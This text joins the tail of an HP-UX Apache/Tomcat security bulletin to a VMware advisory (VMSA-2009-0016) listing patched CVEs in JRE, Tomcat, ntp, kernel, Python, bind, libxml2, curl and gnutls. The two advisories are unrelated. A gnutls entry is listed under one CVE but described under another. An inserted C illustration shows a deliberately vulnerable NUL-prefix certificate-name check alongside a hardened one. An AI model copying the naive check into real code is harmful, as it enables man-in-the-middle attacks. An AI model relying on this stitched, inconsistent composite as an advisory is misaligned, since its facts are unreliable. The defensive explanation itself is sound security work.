Note: HP-UX Web Server Suite v.3.02 contains HP-UX Apache-based Web Server v.2.2.8.01.02
and HP-UX Tomcat-based Servlet Engine 5.5.27.01.01
HP-UX Release - B.11.23 and B.11.31 PA-32
Apache Depot name - HPUXWSATW-B302-32.depot
HP-UX Release - B.11.23 and B.11.31 IA-64
Apache Depot name - HPUXWSATW-B302-64.depot
HP-UX Release - B.11.11 PA-32
Apache Depot name - HPUXWSATW-B222-1111.depot
MANUAL ACTIONS: Yes - Update
Install Apache-based Web Server or Tomcat-based Servlet Engine from the Apache Web Server Suite v3.02 or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
==================
hpuxwsAPACHE.APACHE
hpuxwsAPACHE.APACHE2
hpuxwsAPACHE.AUTH_LDAP
hpuxwsAPACHE.AUTH_LDAP2
hpuxwsAPACHE.MOD_JK
hpuxwsAPACHE.MOD_JK2
hpuxwsAPACHE.MOD_PERL
hpuxwsAPACHE.MOD_PERL2
hpuxwsAPACHE.PHP
hpuxwsAPACHE.PHP2
hpuxwsAPACHE.WEBPROXY
hpuxwsTOMCAT.TOMCAT
hpuxwsWEBMIN.WEBMIN
action: install revision B.2.2.8.01.02 or subsequent
URL: http://software.hp.com
HP-UX B.11.23
==================
hpuxws22APCH32.APACHE
hpuxws22APCH32.APACHE2
hpuxws22APCH32.AUTH_LDAP
hpuxws22APCH32.AUTH_LDAP2
hpuxws22APCH32.MOD_JK
hpuxws22APCH32.MOD_JK2
hpuxws22APCH32.MOD_PERL
hpuxws22APCH32.MOD_PERL2
hpuxws22APCH32.PHP
hpuxws22APCH32.PHP2
hpuxws22APCH32.WEBPROXY
hpuxws22APCH32.WEBPROXY2
hpuxws22TOMCAT.TOMCAT
hpuxws22WEBMIN.WEBMIN
action: install revision B.2.2.8.01.02 or subsequent
URL: http://software.hp.com
HP-UX B.11.31
==================
hpuxws22APACHE.APACHE
hpuxws22APACHE.APACHE2
hpuxws22APACHE.AUTH_LDAP
hpuxws22APACHE.AUTH_LDAP2
hpuxws22APACHE.MOD_JK
hpuxws22APACHE.MOD_JK2
hpuxws22APACHE.MOD_PERL
hpuxws22APACHE.MOD_PERL2
hpuxws22APACHE.PHP
hpuxws22APACHE.PHP2
hpuxws22APACHE.WEBPROXY
hpuxws22APACHE.WEBPROXY2
hpuxws22TOMCAT.TOMCAT
hpuxws22WEBMIN.WEBMIN
action: install revision B.2.2.8.01.02 or subsequent
URL: http://software.hp.com
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) 2 February 2009 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@hp.com
Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
- check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
- verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
© Copyright 2009 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- -----------------------------------------------------------------------
VMware Security Advisory
Advisory ID: VMSA-2009-0016
Synopsis: VMware vCenter and ESX update release and vMA patch
release address multiple security issues in third
party components
Issue date: 2009-11-20
Updated on: 2009-11-20 (initial release of advisory)
CVE numbers: --- JRE ---
CVE-2009-1093 CVE-2009-1094 CVE-2009-1095
CVE-2009-1096 CVE-2009-1097 CVE-2009-1098
CVE-2009-1099 CVE-2009-1100 CVE-2009-1101
CVE-2009-1102 CVE-2009-1103 CVE-2009-1104
CVE-2009-1105 CVE-2009-1106 CVE-2009-1107
CVE-2009-2625 CVE-2009-2670 CVE-2009-2671
CVE-2009-2672 CVE-2009-2673 CVE-2009-2675
CVE-2009-2676 CVE-2009-2716 CVE-2009-2718
CVE-2009-2719 CVE-2009-2720 CVE-2009-2721
CVE-2009-2722 CVE-2009-2723 CVE-2009-2724
--- Tomcat ---
CVE-2008-5515 CVE-2009-0033 CVE-2009-0580
CVE-2009-0781 CVE-2009-0783 CVE-2008-1232
CVE-2008-1947 CVE-2008-2370 CVE-2007-5333
CVE-2007-5342 CVE-2007-5461 CVE-2007-6286
CVE-2008-0002
--- ntp ---
CVE-2009-1252 CVE-2009-0159
--- kernel ---
CVE-2008-3528 CVE-2008-5700 CVE-2009-0028
CVE-2009-0269 CVE-2009-0322 CVE-2009-0675
CVE-2009-0676 CVE-2009-0778 CVE-2008-4307
CVE-2009-0834 CVE-2009-1337 CVE-2009-0787
CVE-2009-1336 CVE-2009-1439 CVE-2009-1633
CVE-2009-1072 CVE-2009-1630 CVE-2009-1192
CVE-2007-5966 CVE-2009-1385 CVE-2009-1388
CVE-2009-1389 CVE-2009-1895 CVE-2009-2406
CVE-2009-2407 CVE-2009-2692 CVE-2009-2698
CVE-2009-0745 CVE-2009-0746 CVE-2009-0747
CVE-2009-0748 CVE-2009-2847 CVE-2009-2848
--- python ---
CVE-2007-2052 CVE-2007-4965 CVE-2008-1721
CVE-2008-1887 CVE-2008-2315 CVE-2008-3142
CVE-2008-3143 CVE-2008-3144 CVE-2008-4864
CVE-2008-5031
--- bind ---
CVE-2009-0696
--- libxml and libxml2 ---
CVE-2009-2414 CVE-2009-2416
--- curl ---
CVE-2009-2417
--- gnutil ---
CVE-2007-2052
- -----------------------------------------------------------------------
1. Summary
Updated Java JRE packages and Tomcat packages address several security
issues. Updates for the ESX Service Console and vMA include kernel,
ntp, Python, bind, libxml, libxml2, curl and gnutil packages. ntp is
also updated for ESXi userworlds.
2. Relevant releases
vCenter Server 4.0 before Update 1
ESXi 4.0 without patch ESXi400-200911201-UG
ESX 4.0 without patches ESX400-200911201-UG, ESX400-200911223-UG,
ESX400-200911232-SG, ESX400-200911233-SG,
ESX400-200911234-SG, ESX400-200911235-SG,
ESX400-200911237-SG, ESX400-200911238-SG
vMA 4.0 before patch 02
3. Problem Description
a. JRE Security Update
JRE update to version 1.5.0_20, which addresses multiple security
issues that existed in earlier releases of JRE.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the following names to the security issues fixed in
JRE 1.5.0_18: CVE-2009-1093, CVE-2009-1094, CVE-2009-1095,
CVE-2009-1096, CVE-2009-1097, CVE-2009-1098, CVE-2009-1099,
CVE-2009-1100, CVE-2009-1101, CVE-2009-1102, CVE-2009-1103,
CVE-2009-1104, CVE-2009-1105, CVE-2009-1106, and CVE-2009-1107.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the following names to the security issues fixed in
JRE 1.5.0_20: CVE-2009-2625, CVE-2009-2670, CVE-2009-2671,
CVE-2009-2672, CVE-2009-2673, CVE-2009-2675, CVE-2009-2676,
CVE-2009-2716, CVE-2009-2718, CVE-2009-2719, CVE-2009-2720,
CVE-2009-2721, CVE-2009-2722, CVE-2009-2723, CVE-2009-2724.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter 4.0 Windows Update 1
VirtualCenter 2.5 Windows affected, patch pending
VirtualCenter 2.0.2 Windows affected, patch pending
Workstation any any not affected
Player any any not affected
Server 2.0 any affected, patch pending
Server 1.0 any not affected
ACE any any not affected
Fusion any any not affected
ESXi any ESXi not affected
ESX 4.0 ESX ESX400-200911223-UG
ESX 3.5 ESX affected, patch pending
ESX 3.0.3 ESX affected, patch pending
ESX 2.5.5 ESX not affected
vMA 4.0 RHEL5 Patch 2 *
* vMA JRE is updated to version JRE 1.5.0_21
Notes: These vulnerabilities can be exploited remotely only if the
attacker has access to the Service Console network.
Security best practices provided by VMware recommend that the
Service Console be isolated from the VM network. Please see
http://www.vmware.com/resources/techresources/726 for more
information on VMware security best practices.
The currently installed version of JRE depends on your patch
deployment history.
b. Update Apache Tomcat version to 6.0.20
Update for VirtualCenter and ESX patch update the Tomcat package to
version 6.0.20 which addresses multiple security issues that existed
in the previous version of Apache Tomcat.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the following names to the security issues fixed in
Apache Tomcat 6.0.20: CVE-2008-5515, CVE-2009-0033, CVE-2009-0580,
CVE-2009-0781, CVE-2009-0783.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the following names to the security issues fixed in
Apache Tomcat 6.0.18: CVE-2008-1232, CVE-2008-1947, CVE-2008-2370.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the following names to the security issues fixed in
Apache Tomcat 6.0.16: CVE-2007-5333, CVE-2007-5342, CVE-2007-5461,
CVE-2007-6286, CVE-2008-0002.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
======== ======== ======= =======================
vCenter 4.0 Windows Update 1
VirtualCenter 2.5 Windows affected, patch pending
VirtualCenter 2.0.2 Windows affected, patch pending
Workstation any any not affected
Player any any not affected
ACE any Windows not affected
Server 2.x any affected, patch pending
Server 1.x any not affected
Fusion any Mac OS/X not affected
ESXi any ESXi not affected
ESX 4.0 ESX ESX400-200911223-UG
ESX 3.5 ESX affected, patch pending
ESX 3.0.3 ESX affected, patch pending
ESX 2.5.5 ESX not affected
vMA 4.0 RHEL5 not affected
Notes: These vulnerabilities can be exploited remotely only if the
attacker has access to the Service Console network.
Security best practices provided by VMware recommend that the
Service Console be isolated from the VM network. Please see
http://www.vmware.com/resources/techresources/726 for more
information on VMware security best practices.
The currently installed version of Tomcat depends on
your patch deployment history.
c. Third party library update for ntp.
The Network Time Protocol (NTP) is used to synchronize a computer's
time with a referenced time source.
ESXi 3.5 and ESXi 4.0 have a ntp client that is affected by the
following security issue. Note that the same security issue is
present in the ESX Service Console as described in section d. of
this advisory.
A buffer overflow flaw was discovered in the ntpd daemon's NTPv4
authentication code. If ntpd was configured to use public key
cryptography for NTP packet authentication, a remote attacker could
use this flaw to send a specially-crafted request packet that could
crash ntpd or, potentially, execute arbitrary code with the
privileges of the "ntp" user.
The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-1252 to this issue.
The NTP security issue identified by CVE-2009-0159 is not relevant
for ESXi 3.5 and ESXi 4.0.
The following table lists what action remediates the vulnerability
in this component (column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi 4.0 ESXi ESXi400-200911201-UG
ESXi 3.5 ESXi affected, patch pending
ESX 4.0 ESX not affected
ESX 3.5 ESX not affected
ESX 3.0.3 ESX not affected
ESX 2.5.5 ESX not affected
vMA 4.0 RHEL5 not affected
* hosted products are VMware Workstation, Player, ACE, Server, Fusion.
d. Service Console update for ntp
Service Console package ntp updated to version ntp-4.2.2pl-9.el5_3.2
The Network Time Protocol (NTP) is used to synchronize a computer's
time with a referenced time source.
The Service Console present in ESX is affected by the following
security issues.
A buffer overflow flaw was discovered in the ntpd daemon's NTPv4
authentication code. If ntpd was configured to use public key
cryptography for NTP packet authentication, a remote attacker could
use this flaw to send a specially-crafted request packet that could
crash ntpd or, potentially, execute arbitrary code with the
privileges of the "ntp" user.
NTP authentication is not enabled by default on the Service Console.
The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-1252 to this issue.
A buffer overflow flaw was found in the ntpq diagnostic command. A
malicious, remote server could send a specially-crafted reply to an
ntpq request that could crash ntpq or, potentially, execute
arbitrary code with the privileges of the user running the ntpq
command.
The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-0159 to this issue.
The following table lists what action remediates the vulnerability
in the Service Console (column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not affected
hosted * any any not affected
ESXi any ESXi not affected
ESX 4.0 ESX ESX400-200911238-SG
ESX 3.5 ESX affected, patch pending **
ESX 3.0.3 ESX affected, patch pending **
ESX 2.5.5 ESX affected, patch pending **
vMA 4.0 RHEL5 Patch 2
* hosted products are VMware Workstation, Player, ACE, Server, Fusion.
** The service consoles of ESX 2.5.5, ESX 3.0.3 and ESX 3.5 are not
affected by CVE-2009-1252. The security issue identified by CVE-2009-0159
has a low impact on the service console of ESX 2.5.5, ESX 3.0.3 and ESX 3.5.
e. Updated Service Console package kernel
Updated Service Console package kernel addresses the security
issues below.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2008-3528, CVE-2008-5700, CVE-2009-0028,
CVE-2009-0269, CVE-2009-0322, CVE-2009-0675, CVE-2009-0676,
CVE-2009-0778 to the security issues fixed in kernel
2.6.18-128.1.6.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2008-4307, CVE-2009-0834, CVE-2009-1337,
CVE-2009-0787, CVE-2009-1336 to the security issues fixed in
kernel 2.6.18-128.1.10.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2009-1439, CVE-2009-1633, CVE-2009-1072,
CVE-2009-1630, CVE-2009-1192 to the security issues fixed in
kernel 2.6.18-128.1.14.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2007-5966, CVE-2009-1385, CVE-2009-1388,
CVE-2009-1389, CVE-2009-1895, CVE-2009-2406, CVE-2009-2407 to the
security issues fixed in kernel 2.6.18-128.4.1.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2009-2692, CVE-2009-2698 to the
security issues fixed in kernel 2.6.18-128.7.1.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2009-0745, CVE-2009-0746, CVE-2009-0747,
CVE-2009-0748, CVE-2009-2847, CVE-2009-2848 to the security issues
fixed in kernel 2.6.18-164.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not applicable
hosted * any any not applicable
ESXi any ESXi not applicable
ESX 4.0 ESX ESX400-200911201-UG
ESX 3.5 ESX not applicable
ESX 3.0.3 ESX not applicable
ESX 2.5.5 ESX not applicable
vMA 4.0 RHEL5 Patch 2 **
* hosted products are VMware Workstation, Player, ACE, Server, Fusion.
** vMA is updated to kernel version 2.6.18-164.
f. Updated Service Console package python
Service Console package Python update to version 2.4.3-24.el5.
When the assert() system call was disabled, an input sanitization
flaw was revealed in the Python string object implementation that
led to a buffer overflow. The missing check for negative size values
meant the Python memory allocator could allocate less memory than
expected. This could result in arbitrary code execution with the
Python interpreter's privileges.
Multiple buffer and integer overflow flaws were found in the Python
Unicode string processing and in the Python Unicode and string
object implementations. An attacker could use these flaws to cause
a denial of service.
Multiple integer overflow flaws were found in the Python imageop
module. If a Python application used the imageop module to
process untrusted images, it could cause the application to
disclose sensitive information, crash or, potentially, execute
arbitrary code with the Python interpreter's privileges.
Multiple integer underflow and overflow flaws were found in the
Python snprintf() wrapper implementation. An attacker could use
these flaws to cause a denial of service (memory corruption).
Multiple integer overflow flaws were found in various Python
modules. An attacker could use these flaws to cause a denial of
service.
An integer signedness error, leading to a buffer overflow, was
found in the Python zlib extension module. If a Python application
requested the negative byte count be flushed for a decompression
stream, it could cause the application to crash or, potentially,
execute arbitrary code with the Python interpreter's privileges.
A flaw was discovered in the strxfrm() function of the Python
locale module. Strings generated by this function were not properly
NULL-terminated, which could possibly cause disclosure of data
stored in the memory of a Python application using this function.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2007-2052 CVE-2007-4965 CVE-2008-1721
CVE-2008-1887 CVE-2008-2315 CVE-2008-3142 CVE-2008-3143
CVE-2008-3144 CVE-2008-4864 CVE-2008-5031 to these issues.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not applicable
hosted * any any not applicable
ESXi any ESXi not applicable
ESX 4.0 ESX ESX400-200911235-SG
ESX 3.5 ESX affected, patch pending
ESX 3.0.3 ESX affected, patch pending
ESX 2.5.5 ESX affected, patch pending
vMA 4.0 RHEL5 Patch 2
* hosted products are VMware Workstation, Player, ACE, Server, Fusion.
g. Updated Service Console package bind
Service Console package bind updated to version 9.3.6-4.P1.el5
The Berkeley Internet Name Domain (BIND) is an implementation of the
Domain Name System (DNS) protocols. BIND includes a DNS server
(named); a resolver library (routines for applications to use when
interfacing with DNS); and tools for verifying that the DNS server
is operating correctly.
A flaw was found in the way BIND handles dynamic update message
packets containing the "ANY" record type. A remote attacker could
use this flaw to send a specially-crafted dynamic update packet
that could cause named to exit with an assertion failure.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2009-0696 to this issue.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
vCenter any Windows not applicable
hosted * any any not applicable
ESXi any ESXi not applicable
ESX 4.0 ESX ESX400-200911237-SG
ESX 3.5 ESX affected, patch pending
ESX 3.0.3 ESX affected, patch pending
ESX 2.5.5 ESX affected, patch pending
vMA 4.0 RHEL5 Patch 2
* hosted products are VMware Workstation, Player, ACE, Server, Fusion.
h. Updated Service Console package libxml2
Service Console package libxml2 updated to version 2.6.26-2.1.2.8.
libxml is a library for parsing and manipulating XML files. A
Document Type Definition (DTD) defines the legal syntax (and also
which elements can be used) for certain types of files, such as XML
files.
A stack overflow flaw was found in the way libxml processes the
root XML document element definition in a DTD. A remote attacker
could provide a specially-crafted XML file, which once opened by a
local, unsuspecting user, would lead to denial of service.
Multiple use-after-free flaws were found in the way libxml parses
the Notation and Enumeration attribute types. A remote attacker
could provide a specially-crafted XML file, which once opened by a
local, unsuspecting user, would lead to denial of service.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2009-2414 and CVE-2009-2416 to these
issues.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware          Product    Running    Replace with/
Product         Version    on         Apply Patch
=============   ========   =======    =================
vCenter         any        Windows    not applicable
hosted *        any        any        not applicable
ESXi            any        ESXi       not applicable
ESX             4.0        ESX        ESX400-200911234-SG
ESX             3.5        ESX        affected, patch pending
ESX             3.0.3      ESX        affected, patch pending
ESX             2.5.5      ESX        affected, patch pending
vMA             4.0        RHEL5      Patch 2
* hosted products are VMware Workstation, Player, ACE, Server, Fusion.
i. Updated Service Console package curl
Service Console package curl updated to version 7.15.5-2.1.el5_3.5
cURL is affected by the previously published "null prefix attack",
caused by incorrect handling of NULL characters in X.509
certificates. If an attacker is able to get a carefully-crafted
certificate signed by a trusted Certificate Authority, the attacker
could use the certificate during a man-in-the-middle attack and
potentially confuse cURL into accepting it by mistake.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2009-2417 to this issue.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware          Product    Running    Replace with/
Product         Version    on         Apply Patch
=============   ========   =======    =================
vCenter         any        Windows    not applicable
hosted *        any        any        not applicable
ESXi            any        ESXi       not applicable
ESX             4.0        ESX        ESX400-200911232-SG
ESX             3.5        ESX        not affected
ESX             3.0.3      ESX        not affected
ESX             2.5.5      ESX        not affected
vMA             4.0        RHEL5      Patch 2
* hosted products are VMware Workstation, Player, ACE, Server, Fusion.
j. Updated Service Console package gnutls
Service Console package gnutls updated to version 1.4.1-3.el5_3.5
A flaw was discovered in the way GnuTLS handles NULL characters in
certain fields of X.509 certificates. If an attacker is able to get
a carefully-crafted certificate signed by a Certificate Authority
trusted by an application using GnuTLS, the attacker could use the
certificate during a man-in-the-middle attack and potentially
confuse the application into accepting it by mistake.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2009-2730 to this issue.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware          Product    Running    Replace with/
Product         Version    on         Apply Patch
=============   ========   =======    =================
vCenter         any        Windows    not applicable
hosted *        any        any        not applicable
ESXi            any        ESXi       not applicable
ESX             4.0        ESX        ESX400-200911233-SG
ESX             3.5        ESX        not affected
ESX             3.0.3      ESX        not affected
ESX             2.5.5      ESX        not affected
vMA             4.0        RHEL5      Patch 2
* hosted products are VMware Workstation, Player, ACE, Server, Fusion.
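The NULL-character flaws in items i (cURL) and j (GnuTLS) share one root cause: an X.509 name component is a length-prefixed ASN.1 string that may legally contain a 0x00 byte, but code that hands those bytes to C string functions compares only the part before the NUL. The following is an added illustration written for this page, not code from cURL, GnuTLS or VMware; the function names and the constructed sample CN are assumptions made for the example.

```c
#include <stddef.h>
#include <string.h>

/*
 * Constructed sample (not a real certificate): a subject CN whose ASN.1
 * length (30 bytes) extends past an embedded NUL. A CA that validated only
 * the bytes after the NUL would have signed the whole value.
 */
static const char SAMPLE_CN[] = "www.example.com\0.attacker.test";
static const size_t SAMPLE_CN_LEN = sizeof(SAMPLE_CN) - 1; /* 30: excludes the C terminator */

/*
 * Vulnerable pattern: the caller knows the ASN.1 length but discards it and
 * lets strcmp() stop at the first NUL, so only the prefix is compared.
 */
int cn_matches_naive(const char *cn, size_t cn_len, const char *host)
{
    (void)cn_len;                     /* length ignored: this is the bug */
    return strcmp(cn, host) == 0;     /* sees "www.example.com" only */
}

/*
 * Hardened check: a NUL anywhere inside the declared length can never be
 * part of a valid hostname, so reject it outright; otherwise compare the
 * full declared length, never a C-string view of it.
 */
int cn_matches_safe(const char *cn, size_t cn_len, const char *host)
{
    if (memchr(cn, '\0', cn_len) != NULL)
        return 0;                     /* embedded NUL: treat as no match */
    size_t host_len = strlen(host);
    if (host_len != cn_len)
        return 0;                     /* lengths differ: cannot be equal */
    return memcmp(cn, host, cn_len) == 0;
}
```

The same rule applies to subjectAltName entries and to any other length-prefixed field that is later compared as a C string.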
4. Solution
Please review the patch/release notes for your product and version
and verify the md5sum of your downloaded file.
VMware vCenter Server 4 Update 1
--------------------------------
Version 4.0 Update 1
Build Number 208156
Release Date 2009/11/19
Type Product Binaries
http://downloads.vmware.com/download/download.do?downloadGroup=VC40U1
VMware vCenter Server 4 and modules
File size: 1.8 GB
File type: .iso
MD5SUM: 057d55b32eb27fe5f3e01bc8d3df3bc5
SHA1SUM: c90134418c2e4d3d6637d8bee44261300ad95ec1
VMware vCenter Server 4 and modules
File size: 1.5 GB
File type: .zip
MD5SUM: f843d9c19795eb3bc5a77f5c545468a8
SHA1SUM: 9a7abd8e70bd983151e2ee40e1b3931525c4480c
VMware vSphere Client and Host Update Utility
File size: 113.8 MB
File type: .exe
MD5SUM: 6cc6b2c958e7e9529c284e48dfae22a9
SHA1SUM: f4c19c63a75d93cffc57b170066358160788c959
VMware vCenter Converter BootCD
File size: 98.8 MB
File type: .zip
MD5SUM: 3df94eb0e93de76b0389132ada2a3799
SHA1SUM: 5d7c04e4f9f8ae25adc8de5963fefd8a4c92464c
VMware vCenter Converter CLI (Linux)
File size: 36.9 MB
File type: .tar.gz
MD5SUM: 3766097563936ba5e03e87e898f6bd48
SHA1SUM: 36d485bdb5eb279296ce8c8523df04bfb12a2cb4
ESXi 4.0 Update 1
-----------------
ESXi400-200911201-UG
https://hostupdate.vmware.com/software/VUM/OFFLINE/release-155-20091116-013169/ESXi-4.0.0-update01.zip
md5sum:c6fdd6722d9e5cacb280bdcc2cca0627
sha1sum:de9d4875f86b6493f9da991a8cff37784215db2e
http://kb.vmware.com/kb/1014886
NOTE: The three ESXi patches for Firmware, VMware Tools, and the
VI Client "C" are contained in a single download file.
ESX 4.0 Update 1
----------------
https://hostupdate.vmware.com/software/VUM/OFFLINE/release-158-20091118-187517/ESX-4.0.0-update01.zip
md5sum: 68934321105c34dcda4cbeeab36a2b8f
sha1sum: 0d8ae58cf9143d5c7113af9692dea11ed2dd864b
http://kb.vmware.com/kb/1014842
To install an individual bulletin use esxupdate with the -b option.
esxupdate --bundle=ESX-4.0.0-update01.zip -b ESX400-200911223-UG
-b ESX400-200911238-SG -b ESX400-200911201-UG -b ESX400-200911235-SG
-b ESX400-200911237-SG -b ESX400-200911234-SG -b ESX400-200911232-SG
-b ESX400-200911233-SG update
5. References
CVE numbers
--- JRE ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1093
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1094
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1095
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1096
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1097
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1098
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1099
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1100
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1101
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1102
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1103
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1104
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1105
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1106
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1107
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2625
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2670
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2671
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2672
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2673
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2675
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2676
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2716
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2718
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2719
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2720
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2721
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2722
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2723
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2724
--- Tomcat ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5515
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0033
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0580
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0781
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0783
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1232
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1947
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2370
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5333
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5342
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5461
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6286
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0002
--- ntp ---
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1252
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0159
